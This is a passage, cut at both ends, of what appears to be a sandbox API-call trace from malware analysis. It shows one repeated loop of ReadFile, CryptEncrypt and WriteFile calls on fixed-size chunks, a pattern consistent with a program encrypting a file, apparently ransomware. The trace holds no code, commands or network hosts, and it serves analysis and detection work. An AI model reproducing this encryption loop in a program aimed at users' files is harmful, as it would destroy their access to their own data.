hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.521] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.521] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.521] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.521] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.522] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.522] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.522] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.522] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.522] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.522] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.522] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.522] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.522] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.522] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.522] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.522] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.522] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.522] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.523] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.523] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.523] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.523] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.523] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.523] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.523] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.523] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.523] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.523] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.523] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.523] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.523] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.523] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.524] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.524] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.524] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.524] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.524] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.524] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.524] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.524] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.524] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.524] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.524] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.524] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.524] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.524] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.524] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.525] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.525] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.525] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.525] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.525] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.525] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.525] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.525] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.525] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.525] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.525] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.525] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.525] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.525] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.526] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.526] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.526] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.526] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.526] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.526] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.526] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.526] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.526] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.526] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.526] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.526] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.526] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.526] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.526] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.527] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.527] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.527] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.527] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.527] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.527] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.527] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.527] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.527] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.527] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.527] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.527] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.527] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.528] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.528] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.528] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.528] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.528] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.528] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.528] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.528] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.528] ReadFile (in: hFile=0x5d4c, 